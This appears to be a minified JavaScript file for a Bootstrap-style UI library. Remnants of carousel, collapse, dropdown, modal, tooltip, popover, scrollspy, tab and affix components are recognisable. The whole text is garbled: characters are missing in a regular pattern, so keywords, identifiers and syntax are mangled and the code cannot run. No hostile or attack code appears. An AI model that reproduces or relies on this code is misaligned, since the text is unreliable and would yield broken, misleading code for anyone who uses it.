tit;ucinbb{eunti.ahfnto({a =(hs,=.aa\"saet)e|.aa\"saet,=e (hs)\"tig=tpo &eb.alc}}a =[aadsis\"lr\"'dfnto()ab.n\"lc\"cti.ls);.ESO=337,.RNIINDRTO=5,.rttp.ls=ucinb{ucinc)gdtc(.rge(coe.saet)rmv(}a =(hs,=.tr\"aatre\";|(=.tr\"rf)ff&.elc(.(=[\\]$/\");a =(#==?]f;&bpeeteal(,.egh|gecoet\"aet),.rge(=.vn(coeb.lr\")biDfutrvne(|(.eoels(i\",.upr.rniin&.aCas\"ae)goe\"srniinn\"c.mltTastoEddTASTO_UAIN:();a =.naetaf.lr=,.naetCntutrdaf.lr.oofitfnto({eunaf.lr=,hs,(ouet.n\"lc.saetdt-p\"cdpooyecoe}jur)+ucina{uesrc\"fnto ()rtr hsec(ucin)vrdati)eddt(b.utn)f\"bet=tpo &be|.aa\"sbto\"enwcti,),tgl\"=?.oge)b&.eSaeb}}a =ucinbd{hs$lmn=()ti.pin=.xed{,.EALSd,hsiLaig!}cVRIN\"..\"cDFUT=laiget\"odn..}cpooyesttt=ucinb{a =dsbe\"dti.eeetedi(ipt)\"a\"\"tl,=.aa)b=Tx\"nl=frstet&.aa\"eeTx\"de()stieu(.rx(ucin)de(ul=[]ti.pin[]fb)\"odnTx\"=?ti.sodn=0dadls()at(,)po(,0)ti.sodn&(hsiLaig!,.eoels()rmvAt()po(,1),hs,),.rttp.ogefnto({a =0bti.eeetcoet'dt-oge\"utn\"';fblnt)vrcti.eeetfn(ipt)\"ai\"=.rp\"ye)(.rp\"hce\"&(=1,.id\"atv\".eoels(atv\",hs$lmn.dCas\"cie):ceko\"=.rp\"ye)&cpo(cekd)=ti.eeethsls(atv\"&(=1,hs$lmn.ogels(atv\")cpo(cekd,hs$lmn.aCas\"cie),&ctigr\"hne)es hs$lmn.tr\"rapesd,ti.eeethsls(atv\")ti.eeettglCas\"cie);a =.nbto;.nbto=,.nbto.osrco=,.nbto.oofitfnto({eunaf.utndti}adcmn)o(cikb.utndt-p\"'dt-oge=bto\"'fnto()vrdactre)coet\"bn)bcl(,tgl\",(.agt.s'nu[ye\"ai\",ipttp=ceko\"'|(.rvnDfut)di(iptbto\"?.rge(fcs)dfn(iptvsbebto:iil\".is(.rge(fcs)}.n\"ou.sbto.aaaibu.sbto.aaai,[aatgl^\"utn],ucinb{(.agt.lss(.t\".ogels(fcs,^ou(n?/ts(.ye))(Qey,fnto()\"s tit;ucinbb{eunti.ahfnto({a =(hs,=.aa\"scrue\",=.xed{,.EALSddt(,ojc\"=yefb&)g\"tig=tpo ?:.ld;|ddt(b.aosl,=e (hsf)\"ubr=tpo ?.ob:?[])fitra&epue)cce))vrcfnto(,)ti.eeetab,hs$niaosti.eeetfn(.aoslidctr\",hsotoscti.asdnl,hssiignl,hsitra=ulti.atv=ulti.iesnl,hsotoskyor&ti.eeeto(kyonb.aosl,.rx(hskyonti),hvr=ti.pin.as&!\"nocsati ouetdcmnEeet&ti.eeeto(muene.scrue\"apoyti.as,hs)o(mueev.scrue\"apoyti.yl,hs);.ESO=337,.RNIINDRTO=0,.EALS{nevl53pue\"oe\"wa:0kyor:0,.rttp.edw=ucina{f!ipttxae/.etatre.aNm){wthawih{ae3:hspe(;ra;ae3:hsnx(;ra;eal:eunapeeteal(},.rttp.yl=ucinb{eunb|ti.asd!)ti.nevl&laItra(hsitra)ti.pin.nevl&ti.asd&ti.nevlstnevlapoyti.etti)ti.pin.nevl)ti}cpooyegttmne=ucina{eunti.iesaprn(.hlrn\"ie\",hs$tm.ne(|ti.atv),.rttp.eIeFrieto=ucinab{a =hsgttmne()d\"rv=a&==|\"et=a&=ti.ieslnt-;fd&ti.pin.rprtr ;a =pe\"=?11f(+)ti.ieslnt;eunti.iese(),.rttp.ofnto()vrbti,=hsgttmne(hs$cieti.eeetfn(.tmatv\")i((>hs$tm.egh1|<)rtr hssiigti.eeetoe\"ldb.aosl,ucin)bt())c=?hspue)cce)ti.ld(>?nx\"\"rv,hs$tm.qa),.rttp.as=ucinb{eunb|ti.asd!)ti.eeetfn(.et pe\".egh&.upr.rniin&ti.eeettigraspottasto.n)ti.yl(0)ti.nevlcernevlti.nevl,hs,.rttp.etfnto({f!hssiigrtr hssie\"et),.rttp.rvfnto({f!hssiigrtr hssie\"rv),.rttp.ld=ucinbd{a =hs$lmn.id\"ie.cie)fd|hsgttmoDrcinbe,=hsitra,=nx\"=?lf\"\"ih\"iti;ffhsls(atv\")eunti.ldn=1vrjf0,=.vn(sieb.aosl,rltdagtjdrcinh)i(hs$lmn.rge()!.sealPeetd){fti.ldn=0g&hspue)ti.idctr.egh{hs$niaosfn(.cie)rmvCas\"cie)vrlati.idctr.hlrn)ti.eIeIdxf];&ladls(atv\"}a =.vn(si.scrue\"{eaeTre:,ieto:};eunaspottasto&ti.eeethsls(sie)(.dCasb,[]ofeWdheadls()fadls()eoe\"srniinn\"fnto({.eoels(bh.on\"\")adls(atv\",.eoels(\"cie,]ji( ),.ldn=1stieu(ucin)i$lmn.rge(),))euaerniinn(.RNIINDRTO):ermvCas\"cie)fadls(atv\",hssiig!,hs$lmn.rge(),&ti.yl(,hs}vrdaf.aoslaf.aoslbaf.aoslCntutrcaf.aoslnCnlc=ucin)rtr .ncrue=,hs;a =ucinc{a ,=(hs,=(.tr\"aatre\"|(=.tr\"rf)&drpae/*?#^s+),\")i(.aCas\"aosl){a =.xed{,.aa)edt()heat(dt-ld-o)h&gitra=1,.alfg,&fdt(b.aosl)t()cpeeteal(};(ouet.n\"lc.scrue.aaai,[aasie\"e.n\"lc.scrue.aaai,[aasiet],)awno)o(la\"fnto({([aard=crue\"'.ahfnto({a =(hs;.alccdt()))(Qey,fnto()\"s tit;ucinbb{a ,=.tr\"aatre\"|(=.tr\"rf)&crpae/*?#^s+),\";eunad}ucincb{eunti.ahfnto({a =(hs,=.aa\"sclas\",=.xed{,.EALScdt(,ojc\"=yefb&)!&ftgl&/hwhd/ts()&ftgl=1,|cdt(b.olpe,=e (hsf)\"tig=tpo &eb(}}a =ucinbc{hs$lmn=()ti.pin=.xed{,.EALSc,hs$rge=([aatgl=clas\"[rf\"'bi+\",dt-oge\"olpe]dt-agt\"'bi+\"',hstastoignl,hsotosprn?hs$aetti.ePrn(:hsadranClasdls(hs$lmn,hs$rge)ti.pin.oge&hstgl(}dVRIN\"..\"dTASTO_UAIN30dDFUT=tgl:0,.rttp.ieso=ucin)vrati.eeethsls(wdh)rtr ?wdh:hih\",.rttp.hwfnto({f!hstastoig&ti.eeethsls(i\")vrbeti.prn&ti.prn.hlrn\"pnl)cide(.n clasn\";f!e&.egh&bedt(b.olpe)b&.rniinn))vrfaEet\"hwb.olpe)i(hs$lmn.rge()!.sealPeetd){&elnt&(.ale\"ie)b|.aa\"sclas\"nl);a =hsdmnin)ti.eeetrmvCas\"olpe)adls(clasn\"[]0.tr\"raepne\"!)ti.tigrrmvCas\"olpe\".tr\"raepne\"!)ti.rniinn=;a =ucin)ti.eeetrmvCas\"olpig)adls(clas n)g(\",hstastoig0ti.eeettigr\"hw.sclas\"}i(aspottasto)eunhcl(hs;a =.aeCs(\"col,]ji(-);hs$lmn.n(bTastoEd,.rx(,hs)euaerniinn(.RNIINDRTO)g(hs$lmn[]i)}}dpooyehd=ucin)i(ti.rniinn&ti.eeethsls(i\")vrbaEet\"ieb.olpe)i(hs$lmn.rge()!.sealPeetd){a =hsdmnin)ti.eeetc(hs$lmn[])[]ofeHih,hs$lmn.dCas\"olpig)rmvCas\"olpei\".tr\"raepne\"!)ti.tigradls(clasd)at(ai-xadd,1,hstastoig1vrefnto({hstastoig0ti.eeetrmvCas\"olpig)adls(clas\".rge(hde.sclas\"}rtr .upr.rniinvi hs$lmn[]0.n(bTastoEd,.rx(,hs)euaerniinn(.RNIINDRTO)ecl(hs}}dpooyetgl=ucin)ti[hs$lmn.aCas\"n)\"ie:so\"(}dpooyegtaetfnto({eunati.pin.aet.id'dt-oge\"olpe]dt-aet\"+hsotosprn+\"'.ahapoyfnto(,)vread;hsadranClasdls(()e}ti).n(}dpooyeadranClasdls=ucinab{a =.aCas\"n)aat(ai-xadd,)btglCas\"olpe\"!)at(ai-xadd,);a =.nclas;.nclas=,.nclas.osrco=,.nclas.oofitfnto({eunaf.olpeeti}adcmn)o(cikb.olpedt-p\"'dt-oge\"olpe],ucind{a =(hs;.tr\"aatre\"|dpeeteal(;a =()gfdt(b.olpe)hg\"oge:.aa)ccl(,))(Qey,fnto()\"s tit;ucinbb{a =.tr\"aatre\";|(=.tr\"rf)cc&#AZ-].etc&crpae/*?#^s*),\")vrdc&()rtr &dlnt?:.aet)fnto ()c&==.hc|(()rmv(,()ec(ucin)vrdati)ebd,=rltdagtti}ehsls(oe\"&(&\"lc\"=.ye&ipttxae/.etctre.aNm)&.otise0,.agt|(.rge(=.vn(hd.sdodw\"f)ciDfutrvne(|(.tr\"raepne\"\"as\",.eoels(oe\".rge(.vn(hde.sdodw\"f))})fnto ()rtr hsec(ucin)vrcati)dcdt(b.rpon)d|.aa\"sdodw\"dnwgti),srn\"=yefb&[]cl())vre\"dodw-akrp,=[aatgl=dodw\"'gfnto()ab.n\"lc.sdodw\"ti.oge}gVRIN\"..\"gpooyetgl=ucind{a =(hs;f!.s\"dsbe,:iald){a =()gfhsls(oe\";fc)!)\"nocsati ouetdcmnEeet&fcoet\"nva-a\".egh&(ouetcetEeet\"i\")adls(dodw-akrp)isrAtrati).n\"lc\"c;a =rltdagtti}i(.rge(=.vn(so.sdodw\"h)diDfutrvne()eunetigr\"ou\".tr\"raepne\"\"re)ftglCas\"pn)tigraEet\"hw.sdodw\"h)rtr!},.rttp.edw=ucinc{f/3|02|2/ts(.hc)&/nu|etraits(.agttgae)vrdati)i(.rvnDfut)csoPoaain)!.s\"dsbe,:iald){a =()gehsls(oe\";f!&2!cwih|&2=cwihrtr 7=.hc&efn()tigr\"ou\",.rge(cik)vrh\"l:o(dsbe)vsbea,=.id\"dodw-eu+)i(.egh{a =.ne(.agt;8=.hc&j0&-,0=.hc&jilnt-&j+~|(=)ie()tigr\"ou\"}};a =.ndodw;.ndodw=,.ndodw.osrco=,.ndodw.oofitfnto({eunaf.rponhti}adcmn)o(cikb.rpondt-p\"c.n\"lc.sdodw.aaai,.rponfr\"fnto()asoPoaain))o(cikb.rpondt-p\"fgpooyetgl)o(kyonb.rpondt-p\"fgpooyekyon.n\"edw.sdodw.aaai,.rponmn\"gpooyekyon}jur)+ucina{uesrc\"fnto (,)rtr hsec(ucin)vreati)fedt(b.oa\",=.xed{,.EALSedt(,ojc\"=yefb&)f|.aa\"smdl,=e (hsg)\"tig=tpo ?[]d:.hw&.hwd}}a =ucinbc{hsotoscti.bd=(ouetbd)ti.eeetab,hs$ilgti.eeetfn(.oa-ilg)ti.bcdo=ulti.shw=ulti.rgnloya=ulti.colaWdh0ti.goeakrplc=1ti.pin.eoe&hs$lmn.id\"mdlcnet)la(hsotosrmt,.rx(ucin)ti.eeettigr\"oddb.oa\"}ti)}cVRIN\"..\"cTASTO_UAIN30cBCDO_RNIINDRTO=5,.EALS{akrp!,ebad!,hw!}cpooyetgl=ucina{eunti.shw?hshd(:hsso(),.rttp.hwfnto()vrdti,=.vn(so.smdl,rltdagtb)ti.eeettigre,hsiSon|.sealPeetd)|ti.shw=0ti.hcSrlbr)ti.eSrlbr)ti.bd.dCas\"oa-pn)ti.sae)ti.eie)ti.eeeto(cikdsisb.oa\"'dt-ims=mdl],.rx(hshd,hs)ti.dao.n\"osdw.ims.smdl,ucin)d$lmn.n(muepdsisb.oa\"fnto()abtre)i(.eeet&(.goeakrplc=0}},hsbcdo(ucin)vreaspottasto&d$lmn.aCas\"ae)d$lmn.aet)lnt|d$lmn.pedod$oy,.eeetso(.colo()dajsDao(,&d$lmn[]ofeWdhd$lmn.dCas\"n)defreou(;a =.vn(sonb.oa\"{eaeTre:};?.dao.n(bTastoEd,ucin)d$lmn.rge(fcs)tigrf}.mltTastoEdcTASTO_UAIN:.eeettigr\"ou\".rge())}cpooyehd=ucinb{&bpeeteal(,=.vn(hd.smdl)ti.eeettigrb,hsiSon&biDfutrvne(&(hsiSon!,hsecp(,hsrsz(,(ouet.f(fcsnb.oa\",hs$lmn.eoels(i\".f(cikdsisb.oa\".f(muepdsisb.oa\",hs$ilgof\"osdw.ims.smdl)aspottasto&ti.eeethsls(fd\"?hs$lmn.n(bTastoEd,.rx(hshdMdlti).mltTastoEdcTASTO_UAIN:hshdMdl)}cpooyeefreou=ucin)adcmn)of\"oui.smdl)o(fcsnb.oa\"apoyfnto()dcmn==.agt|hs$lmn[]=atre|ti.eeethsatre)lnt|ti.eeettigr\"ou\"}ti)}cpooyeecp=ucin)ti.shw&ti.pin.ebadti.eeeto(kyondsisb.oa\"apoyfnto()2=awih&hshd(}ti):hsiSon|hs$lmn.f(kyondsisb.oa\"}cpooyersz=ucin)ti.shw?(idw.n\"eieb.oa\"apoyti.adepaeti):(idw.f(rsz.smdl),.rttp.ieoa=ucin)vrati;hs$lmn.ie)ti.akrpfnto({.bd.eoels(mdloe\",.eeAjsmns)arstcola(,.eeettigr\"idnb.oa\"}}cpooyermvBcdo=ucin)ti.bcdo&ti.bcdo.eoe)ti.bcdo=ul,.rttp.akrpfnto()vrdti,=hs$lmn.aCas\"ae)\"ae:\"i(hsiSon&hsotosbcdo)vrfaspottasto&ei(hs$akrpadcmn.raelmn(dv).dCas\"oa-akrp\"e.pedoti.bd)ti.eeeto(cikdsisb.oa\"apoyfnto()rtr hsinrBcdoCikvi(hsinrBcdoCik!)vi(.agt=acretagt&\"ttc=ti.pin.akrpti.eeet0.ou(:hshd()}ti),&ti.bcdo[]ofeWdhti.bcdo.dCas\"n)!)eunfti.bcdo.n(bTastoEd,)euaerniinn(.AKRPTASTO_UAIN:(}lei(ti.shw&ti.bcdo)ti.bcdo.eoels(i\";a =ucin)drmvBcdo(,&b);.upr.rniin&hs$lmn.aCas\"ae)ti.bcdo.n(bTastoEd,)euaerniinn(.AKRPTASTO_UAIN:(}leb&(}cpooyehnlUdt=ucin)ti.dutilg),.rttp.dutilgfnto({a =hs$lmn[]srlHih>ouetdcmnEeetcinHih;hs$lmn.s(pdiget!hsbdIOefoig&?hssrlbrit:\"pdigih:hsbdIOefoig&ati.colaWdh\"}}cpooyerstdutet=ucin)ti.eeetcs{adnLf:\"pdigih:\"),.rttp.hcSrlbrfnto({a =idwinrit;f!)vrbdcmn.ouetlmn.eBudnCinRc(;=.ih-ahasblf)ti.oysvrlwn=ouetbd.letit<,hssrlbrit=hsmauecola(}cpooyestcola=ucin)vrapren(hs$oycs\"adn-ih\"|01)ti.rgnloya=ouetbd.tl.adnRgt|\"ti.oysvrlwn&ti.bd.s(pdigrgt,+hssrlbrit),.rttp.eeSrlbrfnto({hs$oycs\"adn-ih\"ti.rgnloya),.rttp.esrSrlbrfnto({a =ouetcetEeet\"i\";.lsNm=mdlsrlbrmaue,hs$oyapn()vrbaofeWdhacinWdhrtr hs$oy0.eoehl()b;a =.nmdlaf.oa=,.nmdlCntutrcaf.oa.oofitfnto({eunaf.oa=,hs,(ouet.n\"lc.smdldt-p\"'dt-oge\"oa\"'fnto()vrdati)edat(he\",=(.tr\"aatre\"|e&.elc(.(=[\\]$/\"),=.aa\"smdl)\"oge:.xed{eoe!#.ete&e,.aa)ddt()di(a)&.rvnDfut)foe\"hwb.oa\"fnto()aiDfutrvne(|foe\"idnb.oa\"fnto({.s\"vsbe)&.rge(fcs)))bcl(,,hs}}jur)+ucina{uesrc\"fnto ()rtr hsec(ucin)vrdati)eddt(b.oli\",=ojc\"=yefb&;e&dsryhd/ts()|e|.aa\"stotp,=e (hsf)\"tig=tpo &eb())vrcfnto(,)ti.yenl,hsotosnl,hsealdnl,hstmotnl,hshvrtt=ulti.eeetnl,hsiSaenl,hsii(totp,,);.ESO=337,.RNIINDRTO=5,.EALS{nmto:0paeet\"o\"slco:1tmlt:<i ls=totp oe\"oli\"<i ls=totparw>/i>dvcas\"oli-ne\"<dv<dv'tigr\"oe ou\"tte\",ea:,tl!,otie:1vepr:slco:bd\"pdig0}cpooyeii=ucinbcd{fti.nbe=0ti.yebti.eeetac,hsotosti.eOtosd,hs$iwotti.pin.iwot&(.sucinti.pin.iwot?hsotosvepr.alti,hs$lmn)ti.pin.iwotslco|ti.pin.iwot,hsiSae{lc:1hvr!,ou:1,hs$lmn[]ntnefdcmn.osrco&!hsotosslco)ho e ro(`eetr pinms eseiidwe ntaiig\"ti.ye\"o h idwdcmn bet\";o(a =hsotostigrslt\"\",=.eghf-)vrgef;f\"lc\"=)hs$lmn.n\"lc.+hstp,hsotosslco,.rx(hstgl,hs)es f\"aul!g{a =hvr=g\"osetr:fcsn,=hvr=g\"oslae:fcsu\"ti.eeeto(+.+hstp,hsotosslco,.rx(hsetrti),hs$lmn.ni\"\"ti.yeti.pin.eetrapoyti.ev,hs)}hsotosslco?hs_pin=.xed{,hsotos{rge:mna\"slco:\")ti.iTte),.rttp.eDfut=ucin)rtr .EALS,.rttp.eOtosfnto()rtr =.xed{,hsgteals)ti.eeetdt(,)bdly&nme\"=yefbdly&bdly{hwbdlyhd:.ea},}cpooyegteeaepin=ucin)vrb{,=hsgteals)rtr hs_pin&aec(hs_pin,ucinad{[]=&([]d},}cpooyeetrfnto()vrcbisaco hscntutrbabcretagt.aa\"s\"ti.ye;eunc|cnwti.osrco(.urnTre,hsgteeaepin()abcretagt.aa\"s\"ti.yec)bisaco .vn&(.ntt[fcsn=btp?fcs:hvr]!)ctp)hsls(i\"|\"n=chvrtt?odchvrtt=i\":cerieu(.ieu)chvrtt=i\"cotosdly&.pin.ea.hwvi(.ieu=eTmotfnto({i\"=.oeSae&.hw),.pin.ea.hw)cso(),.rttp.snttTu=ucin)frvrai hsiSaei(hsiSaea)eun0rtr!}cpooyelaefnto()vrcbisaco hscntutrbabcretagt.aa\"s\"ti.ye;fc|cnwti.osrco(.urnTre,hsgteeaepin()abcretagt.aa\"s\"ti.yec)bisaco .vn&(.ntt[fcsu\"=.ye\"ou\"\"oe\"=1,ciISaere)rtr laTmotctmot,.oeSae\"u\"cotosdly&.pin.ea.ievi(.ieu=eTmotfnto({ot=chvrtt&chd(}cotosdlyhd):.ie),.rttp.hwfnto({a =.vn(so.s\"ti.ye;fti.aCnet)&hseald{hs$lmn.rge()vrdacnan(hs$lmn[]onrouetdcmnEeetti.eeet0)i(.sealPeetd)|drtr;a =hsfti.i(,=hsgtI(hstp)ti.eCnet)fat(i\"g,hs$lmn.tr\"radsrbdy,)ti.pin.nmto&fadls(fd\";a =fnto\"=yefti.pin.lcmn?hsotospaeetcl(hsf0,hs$lmn[]:hsotospaeeti/sat?s/,=.eth;&(=.elc(,\"|\"o\",.eah)cs{o:,et0dsly\"lc\")adls()dt(b.+hstp,hs,hsotoscnanrfapnT(hsotoscnanr:.netfe(hs$lmn)ti.eeettigr\"netdb.+hstp)vrkti.ePsto(,=[]ofeWdhmf0.fstegti()vrnhoti.ePsto(hs$iwot;=bto\"=&kbto+>.otm\"o\"\"o\"=&ktpmotp\"otm:rgt=h&.ih+>.it?lf\"\"et=h&.etlolf?rgt:,.eoels()adls()vrpti.eCluaeOfe(,,,)ti.plPaeetph;a =ucin)vraehvrtt;.eeettigr\"hw.s\"etp)ehvrtt=ul\"u\"=&elaee}aspottasto&ti.tphsls(fd\"?.n(bTastoEd,)euaerniinn(.RNIINDRTO)q)}cpooyeapylcmn=ucinbc{a =hstp)ed0.fstit,=[]ofeHih,=asItdcs\"agntp)1)hpren(.s(mri-et)1)iNNg&(=)iNNh&(=)btp=,.et=,.fststfstd0,.xed{sn:ucina{.s(tpMt.on(.o)lf:ahrudalf))}b,)dadls(i\";a =[]ofeWdhjd0.fstegt\"o\"=&j=&(.o=.o+-)vrkti.eVeprAjseDlacbij;.etblf+klf:.o+ktpvrl/o|otm.etc,=?*.etei2ktpfjnl\"fstit\"\"fstegt;.fstb,hsrpaero(,[]n,),.rttp.elcArwfnto(,,)ti.ro(.s(?lf\"\"o\"5*1ab+%)csc\"o\"\"et,\"}cpooyestotn=ucin)vrati.i(,=hsgtil(;.id\"totpinr)ti.pin.tl\"tl:tx\"()armvCas\"aei o otmlf ih\"}cpooyehd=ucinb{ucind)\"n!ehvrtt&fdtc(,.eeet&.eeetrmvAt(ai-ecieb\".rge(hde.s\"etp)b&(}a =hsfati.tp,=.vn(hd.s\"ti.ye;fti.eeettigrg,giDfutrvne()eunfrmvCas\"n)aspottasto&fhsls(fd\"?.n(bTastoEd,)euaerniinn(.RNIINDRTO)d)ti.oeSaenl,hs,.rttp.iTtefnto({a =hs$lmn;aat(tte)|srn\"=yefaat(dt-rgnltte)&aat(dt-rgnltte,.tr\"il\"|\")at(tte,\"}cpooyehsotn=ucin)rtr hsgtil(}cpooyegtoiinfnto()bb|hs$lmn;a =[]d\"OY=ctgaeecgtonigletet)nl=ewdh&eaetn(}e{it:.ih-.ethih:.otmetp);a =idwSGlmn&cisaco idwSGlmn,=?tp0lf:}fnl:.fst)h{colddcmn.ouetlmn.colo|dcmn.oysrlTpbsrlTp),=?wdhawno)wdh)hih:(idw.egt):ulrtr .xed{,,,,),.rttp.eCluaeOfe=ucinabcd{eunbto\"=?tpbtpbhih,etblf+.it/-/}\"o\"=?tpbtpdlf:.etbwdh2c2:lf\"=?tpbtpbhih/-/,etblf-}{o:.o+.egt2d2lf:.etbwdh}cpooyegtiwotdutdet=ucinabcd{a =tp0lf:}i(ti.vepr)eunevrfti.pin.iwot&hsotosvepr.adn|0gti.ePsto(hs$iwot;f/ih|et.eta)vrhbtpfgsrl,=.o+-.coldhgtpetpgtphigtpghih&(.o=.o+.egti}levrjblf-,=.etfcjglf?.etglf-:>.ih&(.etglf+.it-)rtr }cpooyegtil=ucin)vrabti.eeetcti.pin;eunabat(dt-rgnltte)|\"ucin=tpo .il?.il.alb0)ctte}cpooyegtI=ucina{oa=~16Mt.adm);hl(ouetgtlmnBI();euna,.rttp.i=ucin)i(ti.tp&ti.tpati.pin.epae,!ti.tplnt)trwnwErrti.ye\"`epae pinms oss featy1tplvleeet\";eunti.tp,.rttp.ro=ucin)rtr hs$ro=hs$ro|ti.i(.id\"totparw),.rttp.nbefnto({hseald!}cpooyedsbefnto({hseald!}cpooyetglEaldfnto({hseald!hseald,.rttp.ogefnto()vrcti;&(=(.urnTre)dt(b.+hstp)c|cnwti.osrco(.urnTre,hsgteeaepin()abcretagt.aa\"s\"ti.yec),?ciSaecik!.ntt.lc,.snttTu(?.ne()claec)ctp)hsls(i\"?.ev()cetrc}cpooyedsryfnto({a =hscerieu(hstmot,hshd(ucin)a$lmn.f(.+.ye.eoeaa\"s\"atp)a$i&a$i.eah)a$i=ula$ro=ula$iwotnl,.eeetnl}}vrdaf.oli;.ntotpbaf.oli.osrco=,.ntotpnCnlc=ucin)rtr .ntotpdti}(Qey,fnto()\"s tit;ucinbb{eunti.ahfnto({a =(hs,=.aa\"sppvr)f\"bet=tpo &b!&/eto|ie.etb|(|ddt(b.ooe\"enwcti,),srn\"=yefb&[])}}a =ucinab{hsii(ppvr,,);f!.ntotptrwnwErr\"ooe eurstotpj\";.ESO=337,.EALSaetn(}af.oli.osrco.EALS{lcmn:rgt,rge:cik,otn:\"tmlt:<i ls=ppvr oe\"oli\"<i ls=arw>/i>h ls=ppvrtte>/3<i ls=ppvrcnet>/i>/i>},.rttp=.xed{,.ntotpCntutrpooye,.rttp.osrco=,.rttp.eDfut=ucin)rtr .EALS,.rttp.eCnetfnto({a =hstp)bti.eTte)cti.eCnet)afn(.ooe-il\"[hsotoshm?hm\"\"et]b,.id\"ppvrcnet)cide(.eah)ed)ti.pin.tl\"tig=tpo ?hm\"\"ped:tx\"()armvCas\"aetpbto etrgti\",.id\"ppvrtte)hm(|afn(.ooe-il\".ie),.rttp.aCnetfnto({eunti.eTte)|hsgtotn(}cpooyegtotn=ucin)vrati.eeetbti.pin;eunaat(dt-otn\"|(fnto\"=yefbcnetbcnetcl([]:.otn),.rttp.ro=ucin)rtr hs$ro=hs$ro|ti.i(.id\"arw);a =.nppvraf.ooe=,.nppvrCntutrcaf.ooe.oofitfnto({eunaf.ooe=,hs}jur)+ucina{uesrc\"fnto (,)ti.bd=(ouetbd)ti.srlEeetaac.sdcmn.oy?idwc,hsotosaetn(}bDFUT,)ti.eetr(hsotostre|\")\".a i>a,hsofes[,hstres[,hsatvTre=ulti.colegt0ti.srlEeeto(srl.ssrlsy,.rx(hspoesti),hsrfeh)ti.rcs(}ucincc{eunti.ahfnto({a =(hs,=.aa\"ssrlsy)f\"bet=tpo &ce|.aa\"ssrlsy,=e (hsf)\"tig=tpo &ec(}}.ESO=337,.EALS{fst1}bpooyegtcolegtfnto({eunti.srlEeet0.colegt|ahmxti.bd[]srlHih,ouetdcmnEeetsrlHih),.rttp.ers=ucin)vrbti,=ofe\"d0ti.fst=]ti.agt=]ti.colegtti.eSrlHih(,.sidwti.srlEeet0)|c\"oiin,=hs$collmn.colo()ti.bd.idti.eetr.a(ucin)vrbati)ebdt(tre\"|bat(he\",=^..ete&ae;eunf&.egh&.s\"vsbe)&[[])tpde]|ul)sr(ucinab{euna0-[])ec(ucin)bofesps(hs0)btresps(hs1)),.rttp.rcs=ucin)vrabti.srlEeetsrlTp)ti.pin.fstcti.eSrlHih(,=hsotosofe+-hs$collmn.egt)eti.fst,=hstresgti.cieagti(hssrlHih!c&hsrfeh)b=)eung=afflnt-]&ti.ciaea;fg&<[]rtr hsatvTre=ulti.la(;o(=.egha-)!fa&b=[]&vi ==[+]|<[+]&ti.ciaefa),.rttp.ciaefnto()\rti.cieagtbti.la(;a =hsslco+[aatre='b']'ti.eetr'he='b'],=()prns\"i)adls(atv\";.aet\"dodw-eu)lnt&(=.lss(l.rpon)adls(atv\")dtigr\"ciaeb.colp\"}bpooyecerfnto({(hsslco)prnsni(hsotostre,.cie)rmvCas\"cie);a =.nsrlsyaf.colp=,.nsrlsyCntutrbaf.colp.oofitfnto({eunaf.colp=,hs,(idw.n\"odb.colp.aaai,ucin)a'dt-p=srl\"'.ahfnto({a =(hs;.albbdt()))(Qey,fnto()\"s tit;ucinbb{eunti.ahfnto({a =(hs,=.aa\"stb)e|.aa\"stb,=e (hs)\"tig=tpo &eb(}}a =ucinb{hseeetab}cVRIN\"..\"cTASTO_UAIN10cpooyeso=ucin)vrbti.lmn,=.lss(u:o(dodw-eu\",=.aa\"agt)i(|(=.tr\"rf)dd&.elc(.(=[\\]$/\"),bprn(l\".aCas\"cie){a =.id\"atv:ata)faEet\"ieb.a\"{eaeTre:[])gaEet\"hwb.a\"{eaeTre:[])i(.rge()btigrg,giDfutrvne(&!.sealPeetd){a =()ti.ciaebcoet\"i)c,hsatvt(,.aet)fnto({.rge(tp:hde.stb,eaeTre:[])btigr{ye\"hw.stb,eaeTre:[]))},.rttp.ciaefnto(,,)fnto ({.eoels(atv\".id\" dodw-eu>.cie)rmvCas\"cie)ed)fn([aatgl=tb])at(ai-xadd,1,.dCas\"cie)fn([aatgl=tb])at(ai-xadd,0,?b0.fstit,.dCas\"n):.eoels(fd\",.aet\"dodw-eu)lnt&bcoet\"idodw\".dCas\"cie)ed)fn([aatgl=tb])at(ai-xadd,0,&e)vrgdfn(>.cie)he&.upr.rniin&glnt&ghsls(fd\"|!dfn(>.ae)lnt)glnt&hgoe\"srniinn\"f.mltTastoEdcTASTO_UAIN:(,.eoels(i\"}vrdaf.a;.ntbbaf.a.osrco=,.ntbnCnlc=ucin)rtr .ntbdti}vrefnto()cpeeteal(,.alati)\"hw);(ouet.n\"lc.stbdt-p\"'dt-oge\"a\"'e.n\"lc.stbdt-p\"'dt-oge\"il],)(Qey,fnto()\"s tit;ucinbb{eunti.ahfnto({a =(hs,=.aa\"safx)f\"bet=tpo &be|.aa\"safx,=e (hsf)\"tig=tpo &eb(}}a =ucinbd{hsotosaetn(}cDFUT,)ti.tre=(hsotostre)o(srl.safxdt-p\"apoyti.hcPsto,hs)o(cikb.fi.aaai,.rx(hscekoiinihvnLo,hs)ti.eeetab,hsafxdnl,hsupnnl,hspneOfe=ulti.hcPsto(}cVRIN\"..\"cRST\"fi fi-o fi-otm,.EALS{fst0tre:idw,.rttp.eSaefnto(,,,)vreti.tre.colo(,=hs$lmn.fst)gti.tre.egt)i(ul=&\"o\"=hsafxdrtr <&\"o\"i(bto\"=hsafxdrtr ul=?(+hsupn=.o)&bto\"!eg=-)&bto\"vrhnl=ti.fie,=?:.o,=?:;eunnl!c&<c\"o\"nl!d&+>ad&bto\",.rttp.ePneOfe=ucin)i(hspneOfe)eunti.indfstti.eeetrmvCascRST.dCas\"fi\";a =hs$agtsrlTp)bti.eeetofe(;eunti.indfstbtpa,.rttp.hcPstoWtEetopfnto({eTmotapoyti.hcPsto,hs,),.rttp.hcPsto=ucin)i(hs$lmn.s\"vsbe){a =hs$lmn.egt)dti.pin.fstedtpfdbto,=ahmxadcmn)hih(,(ouetbd)hih()\"bet!tpo &(==)\"ucin=tpo &(=.o(hs$lmn),fnto\"=yeff&fdbto(hs$lmn);a =hsgttt(,,,)i(hsafxd=)nl!ti.ni&ti.eeetcs\"o\"\")vri\"fi\"(?-+:\",=.vn(+.safx)i(hs$lmn.rge()jiDfutrvne()eunti.fie=,hsupn\"otm=hti.ePneOfe(:ulti.eeetrmvCascRST.dCasi.rge(.elc(afx,afxd)\"b.fi\"}bto\"=&ti.eeetofe(tpgbf)}vrdaf.fi;.nafxbaf.fi.osrco=,.nafxnCnlc=ucin)rtr .nafxdti}awno)o(la\"fnto({([aasy\"fi\"'.ahfnto({a 